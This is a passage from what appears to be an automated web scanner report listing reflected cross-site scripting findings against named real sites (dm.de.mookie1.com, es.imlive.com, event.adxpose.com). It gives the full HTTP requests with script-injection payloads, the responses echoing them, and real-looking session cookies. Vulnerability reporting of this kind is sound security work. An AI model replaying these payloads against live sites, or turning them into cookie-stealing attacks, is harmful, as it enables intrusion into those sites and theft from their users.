Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e11"><script>alert(1)</script>6e135e30f8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11678985058@x95f9e11"><script>alert(1)</script>6e135e30f8a?na_id= HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/940763935/x95f9e11"><script>alert(1)</script>6e135e30f8a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.392. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [na_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Issue detail

The value of the na_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c19f'-alert(1)-'e256993ce30 was submitted in the na_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/DLX/11678985058@x95?na_id=8c19f'-alert(1)-'e256993ce30 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2554
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = 'na_id=8c19f'-alert(1)-'e256993ce30';
dlx_segment_list = dlx_segment_list.replace(/&/g,'|');
dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='//t.mooki
...[SNIP]...

4.393. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11678985058@x95

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91653'-alert(1)-'7447a25ebae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/DLX/11678985058@x95?na_id=&91653'-alert(1)-'7447a25ebae=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2556
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = 'na_id=&91653'-alert(1)-'7447a25ebae=1';
dlx_segment_list = dlx_segment_list.replace(/&/g,'|');
dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='//t.moo
...[SNIP]...

4.394. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f1d"><script>alert(1)</script>19238ad28da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM50f1d"><script>alert(1)</script>19238ad28da/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM50f1d"><script>alert(1)</script>19238ad28da/DLX/513286872/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.395. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353bc"><script>alert(1)</script>1ee4471c2b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX353bc"><script>alert(1)</script>1ee4471c2b4/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX353bc"><script>alert(1)</script>1ee4471c2b4/2126199330/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.396. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755bc"><script>alert(1)</script>1f0f4c39874 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x94755bc"><script>alert(1)</script>1f0f4c39874 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1787170245/x94755bc"><script>alert(1)</script>1f0f4c39874/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.397. http://es.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
Set-Cookie: spvdr=vd=903513d8-3e33-4831-96f3-029102fe04ec&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 19524
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;">
...[SNIP]...

4.398. http://es.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ba938df6-402f-42af-9e74-39a2f773e158&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:09 GMT
Connection: close
Content-Length: 19123
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/?86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&iy=dallas&id=44&iu=1&vd=ba938df6-402f-42af-9e74-39a2f773e158';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.399. http://es.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:24 GMT
Connection: close
Content-Length: 23570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.400. http://es.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:29 GMT
Connection: close
Content-Length: 23570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.401. http://es.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 8313
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=es.imlive.com&ul=/webcam-login/25492'onerror='alert(1)'4929c58198/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://es.imlive.com:80/webcam-login/25492'onerror='alert(1)'4929c58198/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.402. http://es.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:17 GMT
Connection: close
Content-Length: 23570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.403. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ddf3f<script>alert(1)</script>ed09fa2b95 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
